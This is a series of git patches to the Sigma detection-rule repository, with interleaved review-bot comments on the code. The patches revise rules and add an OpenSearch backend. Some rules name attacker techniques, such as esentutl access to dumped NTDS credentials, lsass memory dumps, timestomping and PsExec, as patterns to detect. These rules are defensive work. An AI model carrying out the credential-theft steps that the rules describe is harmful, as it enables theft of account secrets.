From: Florian Roth Date: Thu, 5 Aug 2021 15:46:01 +0200 Subject: [PATCH 0181/1367] Update powershell_timestomp.yml --- rules/windows/powershell/powershell_timestomp.yml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_timestomp.yml b/rules/windows/powershell/powershell_timestomp.yml index bc0cb449..5c53560c 100644 --- a/rules/windows/powershell/powershell_timestomp.yml +++ b/rules/windows/powershell/powershell_timestomp.yml @@ -3,9 +3,7 @@ id: c6438007-e081-42ce-9483-b067fbef33c3 status: experimental author: frack113 date: 2021/08/03 -description: | - Adversaries may modify file time attributes to hide new or changes to existing files. - Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. +description: Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md - https://www.offensive-security.com/metasploit-unleashed/timestomp/ @@ -30,4 +28,4 @@ detection: condition: selection_id and selection_ioc falsepositives: - legitime admin script -level: medium \ No newline at end of file +level: medium From 3634901bf1fe6683ac5093b56868fa4e807a377a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 5 Aug 2021 15:47:29 +0200 Subject: [PATCH 0182/1367] Update poweshell_detect_vm_env.yml --- rules/windows/powershell/poweshell_detect_vm_env.yml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/poweshell_detect_vm_env.yml b/rules/windows/powershell/poweshell_detect_vm_env.yml index 2e30001f..7b810af9 100644 --- a/rules/windows/powershell/poweshell_detect_vm_env.yml 
+++ b/rules/windows/powershell/poweshell_detect_vm_env.yml @@ -3,9 +3,7 @@ id: d93129cd-1ee0-479f-bc03-ca6f129882e3 status: experimental author: frack113 date: 2021/08/03 -description: | - Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. - This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox +description: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md - https://techgenix.com/malicious-powershell-scripts-evade-detection/ @@ -28,4 +26,4 @@ detection: condition: all of selection_* falsepositives: - Unknown -level: medium \ No newline at end of file +level: medium From b353a106439e5f95f66482ca1978e19fb4766123 Mon Sep 17 00:00:00 2001 From: RedKyper Date: Thu, 5 Aug 2021 20:37:07 +0200 Subject: [PATCH 0183/1367] elastalert multi output file --- tools/sigma/backends/elasticsearch.py | 12 +++++++----- tools/sigma/sigmac.py | 18 ++++-------------- 2 files changed, 11 insertions(+), 19 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index b00a1107..ead21368 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1321,6 +1321,7 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): self.elastalert_alerts[rule_object['name']] = rule_object #Clear fields self.fields = [] + return str(yaml.dump(rule_object, default_flow_style=False, width=10000)) def generateNode(self, node): #Save fields for adding them in query_key 
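Review bot: The new return wraps `yaml.dump(...)` in `str()`, which is redundant: `yaml.dump` called without a stream already returns a `str`, so `return yaml.dump(rule_object, default_flow_style=False, width=10000)` is equivalent and clearer. Returning the document here while the line above still stores every rule in `self.elastalert_alerts` means that dict keeps growing across a multi-rule run even though, with `finalize` emptied in the next hunk, it appears to have no remaining reader; if nothing else consumes it, the assignment can go too. The enclosing method starts outside this hunk, so whether a base-class contract expects a `str` return from it cannot be confirmed here.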
@@ -1369,11 +1370,12 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): }.get(level, 2) def finalize(self): - result = "" - for rulename, rule in self.elastalert_alerts.items(): - result += yaml.dump(rule, default_flow_style=False, width=10000) - result += '\n' - return result + pass + # result = "" + # for rulename, rule in self.elastalert_alerts.items(): + # result += yaml.dump(rule, default_flow_style=False, width=10000) + # result += '\n' + # return result class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): """Elastalert backend""" diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 0da400c2..5a382b50 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -252,7 +252,6 @@ def main(): nb_result = len(list(copy.deepcopy(results))) inc_filenane = None if nb_result < 2 else 0 - newline_separator = '\0' if cmdargs.print0 else '\n' for result in results: 
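Review bot: `finalize` is reduced to `pass` with its previous body kept as five commented-out lines; dead code should be deleted rather than commented, since a later reader cannot tell whether it is meant to return. The method now implicitly returns `None` where it used to return a `str`, so any caller that prints or concatenates `backend.finalize()` (sigmac's output path, if it does not guard on a falsy result) would emit `None` — worth confirming before merging. If per-rule output from `generate` is now the only output path, say so in place of the comments: `def finalize(self):` / `"""Alerts are emitted per rule from generate(); nothing is left to flush."""` / `return None`.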
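Review bot: This hunk deletes `newline_separator = '\0' if cmdargs.print0 else '\n'` from `main()`, but the next hunk (`@@ -275,21 +274,12 @@`) still carries `print(result, file=out, end=newline_separator)` as an unchanged line, so unless the name is also bound earlier in `main()` (outside both hunks) the first converted rule raises `NameError`, and the `--print0` separator option is lost either way. Restoring the assignment, `newline_separator = '\0' if cmdargs.print0 else '\n'`, before the `for result in results:` loop fixes both. `main()` begins outside this hunk.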
@@ -275,21 +274,12 @@ def main(): exit(ERR_OUTPUT) print(result, file=out, end=newline_separator) - if nb_result == 0: # elastalert return "results=[]" so get a error with out not def - if not fileprefix == None and not inc_filenane == None: #yml action + if nb_result == 0: # backend get only 1 output + if not fileprefix == None: # want a prefix anyway try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml','_' + str(inc_filenane) + filename_ext) - inc_filenane += 1 - out = open(filename, "w", encoding='utf-8') - except (IOError, OSError) as e: - print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) - elif not fileprefix == None and inc_filenane == None: # a simple yml - try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml',filename_ext) + filename = "%s%s_nono_output%s" % (fileprefix,cmdargs.target,filename_ext) out = open(filename, "w", encoding='utf-8') + fileprefix = None # no need to open the same file many time except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) From 4a8192fecc78f8df0c74b6edfab69d7992eb48ff Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 22:38:48 +0200 Subject: [PATCH 0184/1367] fix typo mono --- tools/sigma/sigmac.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 5a382b50..05f12299 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -277,7 +277,7 @@ def main(): if nb_result == 0: # backend get only 1 output if not fileprefix == None: # want a prefix anyway try: - filename = "%s%s_nono_output%s" % (fileprefix,cmdargs.target,filename_ext) + filename = "%s%s_mono_output%s" % (fileprefix,cmdargs.target,filename_ext) out = open(filename, "w", encoding='utf-8') fileprefix = None # no need to open the same file many time except (IOError, OSError) as e: 
From 96911e55b954000e1488215c01a3131a4b42dc98 Mon Sep 17 00:00:00 2001 From: Sam0x90 Date: Fri, 6 Aug 2021 00:55:57 +0400 Subject: [PATCH 0185/1367] Adding detection rule for esentutl utility Used by Conti affiliates to target NTDS file and MSEdge info --- .../process_creation/Conti_esentutl.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/windows/process_creation/Conti_esentutl.yaml diff --git a/rules/windows/process_creation/Conti_esentutl.yaml b/rules/windows/process_creation/Conti_esentutl.yaml new file mode 100644 index 00000000..7a29a633 --- /dev/null +++ b/rules/windows/process_creation/Conti_esentutl.yaml @@ -0,0 +1,32 @@ +title: Detection of esentutl aka Extensible Storage Engine Utilities to gather credentials +id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 +status: experimental +author: sam0x90 +date: 2021/08/06 +description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module "pwgrab" +references: + - https://twitter.com/vxunderground/status/1423336151860002816 + - https://attack.mitre.org/software/S0404/ + - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ +tags: + - attack.credential_access + - attack.t1003 + - attack.t1003.003 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - 'esentutl' + selection_password: + CommandLine|contains: ' /p' + condition: all of them +falsepositives: + - To be determined +level: medium +fields: + - User + - CommandLine + - ParentCommandLine + - CurrentDirectory \ No newline at end of file From faba4f481b7808d04b04a23381df1276fe273cdb Mon Sep 17 00:00:00 2001 
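Review bot: The new rule is named `Conti_esentutl.yaml`, while every other rule path on this page is lowercase with a `.yml` extension (`win_tool_psexec.yml`, `sysmon_lsass_memory_dump_file_creation.yml`); any tooling or CI that selects `rules/**/*.yml` would skip this file, and the capitalised, actor-named filename departs from the repository's habit of naming rules by the behaviour they detect. The `description` misspells the utility as `esentult`, and the file ends without a trailing newline. `falsepositives: - To be determined` could already name the obvious benign case — administrators running `esentutl /p` to repair a damaged database — which also informs the `level`. Renaming to something like `win_susp_esentutl_params.yml` (a constructed example) and fixing the typo would bring it in line with the sibling rules.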
From: Young Date: Thu, 5 Aug 2021 18:50:18 -0700 Subject: [PATCH 0186/1367] initial commit --- tools/config/winlogbeat.yml | 1 + tools/sigma/backends/base.py | 2 + .../sigma/backends/defaultOpensearchValues.py | 11 + tools/sigma/backends/opensearch.py | 550 ++++++++++++++++++ tools/sigma/sigmac.py | 4 + 5 files changed, 568 insertions(+) create mode 100644 tools/sigma/backends/defaultOpensearchValues.py create mode 100644 tools/sigma/backends/opensearch.py diff --git a/tools/config/winlogbeat.yml b/tools/config/winlogbeat.yml index 87ffb4ac..d640f433 100644 --- a/tools/config/winlogbeat.yml +++ b/tools/config/winlogbeat.yml @@ -10,6 +10,7 @@ backends: - elastalert - elastalert-dsl - ee-outliers + - os-monitor logsources: windows: product: windows diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index e9901e06..91d2bf1b 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -117,6 +117,7 @@ class BaseBackend: if len(sigmaparser.condparsed) > 1: raise NotImplementedError("Base backend doesn't support multiple conditions") for parsed in sigmaparser.condparsed: + print(f'\nParsed: {parsed}\n') query = self.generateQuery(parsed) before = self.generateBefore(parsed) after = self.generateAfter(parsed) @@ -133,6 +134,7 @@ class BaseBackend: def generateQuery(self, parsed): result = self.generateNode(parsed.parsedSearch) + print(f'\nResult: {result}\n') if parsed.parsedAgg: result += self.generateAggregation(parsed.parsedAgg) #result = self.applyOverrides(result) diff --git a/tools/sigma/backends/defaultOpensearchValues.py b/tools/sigma/backends/defaultOpensearchValues.py new file mode 100644 index 00000000..b31d28c6 --- /dev/null +++ b/tools/sigma/backends/defaultOpensearchValues.py 
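Review bot: The `print(f'\nParsed: {parsed}\n')` added to `BaseBackend.generate` and `print(f'\nResult: {result}\n')` added to `generateQuery` are debug statements on stdout, the same stream sigmac writes converted queries to (`print(result, file=out, ...)` in the sigmac hunk visible earlier on this page), so every backend — not only the new OpenSearch one — now emits debug text mixed into its output. The same applies to the `print(f'backend options: ...')`, `print(f'sigma configs: ...')`, `print(f'backend: ...')` and `print(f'\nparser: {parser.parsers[0].condtoken} ...')` lines added to `sigmac.py` in the last two hunks of this commit. Remove them, or route them through `logging.getLogger(__name__).debug(...)` or `print(..., file=sys.stderr)` behind a verbosity flag so the machine-readable output stays clean. Both methods begin outside their hunks.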
@@ -0,0 +1,11 @@ +RULE_TYPE = "monitor" +IS_ENABLED = True +INTERVAL = 5 +UNIT = "MINUTES" +TRIGGER_NAME = "generated-trigger" +SEVERITIES = {"informational": "5", "low": "4", "medium": "3", "high": "2", "critical": "1"} +RESULTS_INDEX = 0 +TRIGGER_INEQUALITY = ">" +TRIGGER_THRESHOLD = 0 +TRIGGER_LANGUAGE = "painless" +MONITOR_INDICES = ["opensearch-security-logs"] \ No newline at end of file diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py new file mode 100644 index 00000000..c57f7cbd --- /dev/null +++ b/tools/sigma/backends/opensearch.py 
@@ -0,0 +1,550 @@ +# Output backends for sigmac +# Copyright 2016-2018 Thomas Patzke, Florian Roth, Devin Ferguson, Julien Bachmann + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + +import json +import re +from fnmatch import fnmatch +import sys +import os +from random import randrange +from distutils.util import strtobool +from uuid import uuid4 + +import sigma +import yaml +from sigma.parser.modifiers.type import SigmaRegularExpressionModifier, SigmaTypeModifier +from sigma.parser.condition import ConditionOR, ConditionAND, NodeSubexpression, SigmaAggregationParser, SigmaConditionParser, SigmaConditionTokenizer + +from sigma.config.mapping import ConditionalFieldMapping +from .base import BaseBackend, SingleTextQueryBackend +from .mixins import RulenameCommentMixin, MultiRuleOutputMixin +from .exceptions import NotSupportedError +from .defaultOpensearchValues import * + +class DeepFieldMappingMixin(object): + def fieldNameMapping(self, fieldname, value): + if isinstance(fieldname, str): + get_config = self.sigmaconfig.fieldmappings.get(fieldname) + if not get_config and '|' in fieldname: + fieldname = fieldname.split('|', 1)[0] + get_config = self.sigmaconfig.fieldmappings.get(fieldname) + if isinstance(get_config, ConditionalFieldMapping): + condition = self.sigmaconfig.fieldmappings.get(fieldname).conditions + for key, item in self.logsource.items(): + if condition.get(key) and 
condition.get(key, {}).get(item): + new_fieldname = condition.get(key, {}).get(item) + if any(new_fieldname): + return super().fieldNameMapping(new_fieldname[0], value) + return super().fieldNameMapping(fieldname, value) + + def generate(self, sigmaparser): + self.logsource = sigmaparser.parsedyaml.get("logsource", {}) + return super().generate(sigmaparser) + +class OpenSearchWildcardHandlingMixin(object): + """ + Determine field mapping to keyword subfields depending on existence of wildcards in search values. Further, + provide configurability with backend parameters. + """ + options = SingleTextQueryBackend.options + ( + ("keyword_field", "keyword", "Keyword sub-field name (default is: '.keyword'). Set blank value if all keyword fields are the base(top-level) field. Additionally see 'keyword_base_fields' for more granular control of the base & subfield situation.", None), + ("analyzed_sub_field_name", "", "Analyzed sub-field name. By default analyzed field is the base field. Therefore, use this option to make the analyzed field a subfield. An example value would be '.text' ", None), + ("analyzed_sub_fields", None, "Fields that have an analyzed sub-field.", None), + ("keyword_base_fields", None, "Fields that the keyword is base (top-level) field. By default analyzed field is the base field. So use this option to change that logic. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("keyword_whitelist", None, "Fields to always set as keyword. Bypasses case insensitive options. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("keyword_blacklist", None, "Fields to never set as keyword (ie: always set as analyzed field). Bypasses case insensitive options. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("case_insensitive_whitelist", None, "Fields to make the values case insensitive regex. Automatically sets the field as a keyword. 
Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("case_insensitive_blacklist", None, "Fields to exclude from being made into case insensitive regex. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("wildcard_use_keyword", "true", "Use analyzed field or wildcard field if the query uses a wildcard value (ie: '*mall_wear.exe'). Set this to 'False' to use analyzed field or wildcard field. Valid options are: true/false", None), + ) + reContainsWildcard = re.compile("(?:(?\\*", value ) + # Make upper/lower + value = re.sub( r"[A-Za-z]", lambda x: "[" + x.group( 0 ).upper() + x.group( 0 ).lower() + "]", value ) + # Turn `.` into wildcard, only if odd number of '\'(because this would mean already escaped) + value = re.sub( r"(((?\.", value ) + # Turn `*` into wildcard, only if odd number of '\'(because this would mean already escaped) + value = re.sub( r"(((?.*", value ) + # Escape additional values that are treated as specific "operators" within Elastic. (ie: @, ?, &, <, >, and ~) + # reference: https://www.elastic.co/guide/en/elasticsearch/reference/current/regexp-syntax.html#regexp-optional-operators + value = re.sub( r"(((?])", "\g<1>\\\\\g<4>", value ) + # Validate regex + try: + re.compile(value) + return {'is_regex': True, 'value': value} + # Regex failed + except re.error: + raise TypeError( "Regular expression validation error for: '%s')" %str(value) ) + else: + return { 'is_regex': False, 'value': value } + +class OpenSearchQuerystringBackend(DeepFieldMappingMixin, OpenSearchWildcardHandlingMixin, SingleTextQueryBackend): + """Converts Sigma rule into OpenSearch query string. 
Only searches, no aggregations.""" + identifier = "es-qs" + active = True + + reEscape = re.compile("([\s+\\-=!(){}\\[\\]^\"~:/]|(?", ">="]: + raise NotImplementedError("Threshold rules can only handle > and >= operators") + if agg.aggfield: + raise NotImplementedError("Threshold rules cannot COUNT(DISTINCT %s)" % agg.aggfield) + self.rule_threshold = { + "field": agg.groupfield if agg.groupfield else [], + "value": int(agg.condition) if agg.cond_op == ">=" else int(agg.condition) + 1 + } + return "" + raise NotImplementedError("Aggregation %s is not implemented for this backend" % agg.aggfunc_notrans) \ No newline at end of file diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 0da400c2..7bbeaeb0 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -214,7 +214,10 @@ def main(): exit(ERR_CONFIG_PARSING) backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) + print(f'backend options: {cmdargs.backend_config}') backend = backend_class(sigmaconfigs, backend_options) + print(f'sigma configs: {backend_options}') + print(f'backend: {backend}') filename_ext = cmdargs.output_extention filename = cmdargs.output @@ -248,6 +251,7 @@ def main(): else: f = sigmafile.open(encoding='utf-8') parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) + print(f'\nparser: {parser.parsers[0].condtoken} \n {parser.parsers[0].condparsed[0]}\n') results = parser.generate(backend) nb_result = len(list(copy.deepcopy(results))) From cf8d8d3ed48bf4b85fe762e3b840c4225ddc4d8d Mon Sep 17 00:00:00 2001 
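Review bot: `OpenSearchQuerystringBackend` declares `identifier = "es-qs"` with `active = True`, which is the target name `ElasticsearchQuerystringBackend` in `elasticsearch.py` already uses, so two active backends answer to the same `--target` and which one sigmac loads depends on discovery order; the commit registers `os-monitor` in `winlogbeat.yml`, which suggests this query-string class either needs its own identifier (e.g. `os-qs`, a constructed example) or should be marked inactive. Most of the 550 lines are a copy of the Elasticsearch module — `DeepFieldMappingMixin`, `OpenSearchWildcardHandlingMixin` with the same option table and escaping regexes, the same regex-validation `TypeError` — rather than imports from `.elasticsearch`, so every future fix there has to be duplicated here. `from .defaultOpensearchValues import *` hides which constants (`RULE_TYPE`, `SEVERITIES`, `MONITOR_INDICES`, ...) the module depends on; an explicit import list is preferable. `from distutils.util import strtobool` relies on a module deprecated in Python 3.10 and removed in 3.12; a small local helper avoids the dependency.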
From: frack113 Date: Fri, 6 Aug 2021 08:43:05 +0200 Subject: [PATCH 0187/1367] fix TargetFilename case error --- .../windows/file_event/sysmon_cve_2021_26858_msexchange.yml | 2 +- .../file_event/sysmon_lsass_memory_dump_file_creation.yml | 2 +- rules/windows/file_event/win_cve_2021_1675_printspooler.yml | 2 +- rules/windows/other/win_tool_psexec.yml | 6 +++--- .../sysmon_cve_2021_31979_cve_2021_33771_exploits.yml | 3 ++- 5 files changed, 8 insertions(+), 7 deletions(-) diff --git a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml index 2e18fec7..0b4ba06e 100644 --- a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml +++ b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml @@ -30,6 +30,6 @@ detection: condition: selection and not filter fields: - ComputerName - - TargetFileName + - TargetFilename falsepositives: - Unknown diff --git a/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml b/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml index b61b425a..6db46020 100755 --- a/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml +++ b/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml @@ -20,7 +20,7 @@ detection: condition: selection fields: - ComputerName - - TargetFileName + - TargetFilename falsepositives: - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator level: medium diff --git a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml index 74ae412f..60ee7dca 100644 --- a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml +++ b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml @@ -24,6 +24,6 @@ detection: condition: selection fields: - ComputerName - - TargetFileName + - TargetFilename falsepositives: - Unknown 
diff --git a/rules/windows/other/win_tool_psexec.yml b/rules/windows/other/win_tool_psexec.yml index 3dee48d0..22a4d3da 100644 --- a/rules/windows/other/win_tool_psexec.yml +++ b/rules/windows/other/win_tool_psexec.yml @@ -5,7 +5,7 @@ status: experimental description: Detects PsExec service installation and execution events (service and Sysmon) author: Thomas Patzke date: 2017/06/12 -modified: 2021/05/16 +modified: 2021/08/06 references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet @@ -22,7 +22,7 @@ fields: - ParentCommandLine - ServiceName - ServiceFileName - - TargetFileName + - TargetFilename - PipeName falsepositives: - unknown @@ -60,4 +60,4 @@ logsource: product: windows detection: sysmon_filecreation: - TargetFileName|endswith: '\PSEXESVC.exe' + TargetFilename|endswith: '\PSEXESVC.exe' diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml index cdede4a8..f2ec067c 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml @@ -5,6 +5,7 @@ status: experimental description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum author: Sittikorn S date: 2021/07/16 +modified: 2021/08/06 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -24,7 +25,7 @@ logsource: category: file_event detection: selection: - TargetFileName|contains: + TargetFilename|contains: - 'C:\Windows\system32\physmem.sys' - 'C:\Windows\System32\IME\IMEJP\imjpueact.dll' - 'C:\Windows\system32\ime\IMETC\IMTCPROT.DLL' 
From 0078ee795b27305e3dfe41be6bf036930fb6b792 Mon Sep 17 00:00:00 2001 From: Lei Chen Date: Fri, 6 Aug 2021 16:47:35 +0800 Subject: [PATCH 0188/1367] chore: update sigma ci badge Replace travis-ci tatus badge with github actions tatus badge --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 424533b5..c5ead69f 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -[![Build Status](https://travis-ci.org/Neo23x0/sigma.svg?branch=master)](https://travis-ci.org/Neo23x0/sigma) +![sigma build sttaus](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master) ![sigma_logo](./images/Sigma_0.3.png) From 932fe14cf69be50e65d567caaa87c33e12d2acdd Mon Sep 17 00:00:00 2001 From: Lei Chen Date: Fri, 6 Aug 2021 16:51:19 +0800 Subject: [PATCH 0189/1367] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c5ead69f..3fb50937 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -![sigma build sttaus](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master) +[![sigma build sttaus](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master)](https://github.com/SigmaHQ/sigma/actions?query=branch%3Amaster) ![sigma_logo](./images/Sigma_0.3.png) From 65251e13e9fac26e3fcfa18a6fa01246cedbf3c0 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 6 Aug 2021 10:52:24 +0200 Subject: [PATCH 0190/1367] Add missing system field --- tools/config/winlogbeat-modules-enabled.yml | 25 ++++++++++++++++++--- 1 file changed, 22 insertions(+), 3 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 3173527a..21b4b19f 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml 
@@ -108,6 +108,8 @@ defaultindex: winlogbeat-* fieldmappings: EventID: event.code Channel: winlog.channel + #Keywords: from "Value" is lost with winlogbeat exist in nxlog + provider name: winlog.provider_name CallingProcessName: winlog.event_data.CallingProcessName ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType @@ -135,8 +137,6 @@ fieldmappings: ClassName: winlog.event_data.ClassName ClassId: winlog.event_data.ClassId DeviceDescription: winlog.event_data.DeviceDescription - # DeviceName => Microsoft-Windows-Ntfs EventID: 98 - DeviceName: winlog.event_data.DeviceName # ErrorCode => printservice-admin EventID: 4909 or 808 ErrorCode: winlog.event_data.ErrorCode FilePath: winlog.event_data.FilePath @@ -211,7 +211,10 @@ fieldmappings: SchemaVersion: winlog.event_data.SchemaVersion ImageLoaded: file.path Signed: file.code_signature.signed - Signature: file.code_signature.subject_name + Signature: + category=driver_loaded: file.code_signature.subject_name + category=image_loaded: file.code_signature.subject_name + default: winlog.event_data.Signature SignatureStatus: file.code_signature.status SourceProcessGuid: process.entity_id SourceProcessId: process.pid @@ -487,3 +490,19 @@ fieldmappings: VirtualAccount: winlog.event_data.VirtualAccount Workstation: winlog.event_data.Workstation WorkstationName: source.domain + # + # System + # + DriveName: winlog.event_data.DriveName + DeviceName: winlog.event_data.DeviceName + HeaderFlags: winlog.event_data.HeaderFlags + Severity: winlog.event_data.Severity + Origin: winlog.event_data.Origin + Verb: winlog.event_data.Verb + Outcome: winlog.event_data.Outcome + SampleLength: winlog.event_data.SampleLength + SampleData: winlog.event_data.SampleData + SourceFile: winlog.event_data.SourceFile + SourceLine: winlog.event_data.SourceLine + SourceTag: winlog.event_data.SourceTag + CallStack: winlog.event_data.CallStack From f4bef0fc39faa2568f1c7216b0a9e1a2a4f05a36 Mon Sep 17 00:00:00 2001 
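Review bot: The comment added at the top of the `@@ -108,6 +108,8 @@` hunk, `#Keywords: from "Value" is lost with winlogbeat exist in nxlog`, does not read as a sentence, so the next maintainer cannot tell whether it records a missing mapping or a known winlogbeat limitation. If the intent is that winlogbeat drops the Keywords value while nxlog keeps it, `# Keywords: not mapped - winlogbeat does not carry the event's Keywords value (nxlog does)` says that. The new `provider name: winlog.provider_name` key is matched literally against the field names used in rules, so its lowercase, space-separated spelling has to be exactly what the rules use; worth confirming before it lands. The `DeviceName` entry that reappears in the new System block at the end of the file loses the `# DeviceName => Microsoft-Windows-Ntfs EventID: 98` provenance comment the removed line carried.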
From: frack113 Date: Fri, 6 Aug 2021 11:12:34 +0200 Subject: [PATCH 0191/1367] Add Microsoft-Windows-Windows Defender/Operational --- .../other/win_defender_amsi_trigger.yml | 3 +- tools/config/winlogbeat-modules-enabled.yml | 41 ++++++++++++++++++- 2 files changed, 42 insertions(+), 2 deletions(-) diff --git a/rules/windows/other/win_defender_amsi_trigger.yml b/rules/windows/other/win_defender_amsi_trigger.yml index bd133c8f..f872bf22 100644 --- a/rules/windows/other/win_defender_amsi_trigger.yml +++ b/rules/windows/other/win_defender_amsi_trigger.yml @@ -2,6 +2,7 @@ title: Windows Defender AMSI Trigger Detected id: ea9bf0fa-edec-4fb8-8b78-b119f2528186 description: Detects triggering of AMSI by Windows Defender. date: 2020/09/14 +modified: 2021/08/06 author: Bhabesh Raj references: - https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps @@ -12,7 +13,7 @@ logsource: detection: selection: EventID: 1116 - DetectionSource: 'AMSI' + Source Name: 'AMSI' condition: selection falsepositives: - unlikely diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 21b4b19f..0736a30f 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -116,7 +116,6 @@ fieldmappings: FailureCode: winlog.event_data.FailureCode FileName: file.path HiveName: winlog.event_data.HiveName - Path: winlog.event_data.Path ProcessCommandLine: winlog.event_data.ProcessCommandLine SecurityID: winlog.event_data.SecurityID Source: winlog.event_data.Source 
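Review bot: Switching the selection in win_defender_amsi_trigger.yml from `DetectionSource` to `Source Name` makes the rule depend on a fieldmapping that, in this commit, only the winlogbeat config gains; any other backend config that mapped `DetectionSource` will now leave `Source Name` unmapped unless it is updated as well. Since a field name with an embedded space is unusual in this rule set, a short comment next to the selection such as `# field name follows the Defender event's 'Source Name' property` would spare readers from assuming it is a typo for the old camel-case name.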
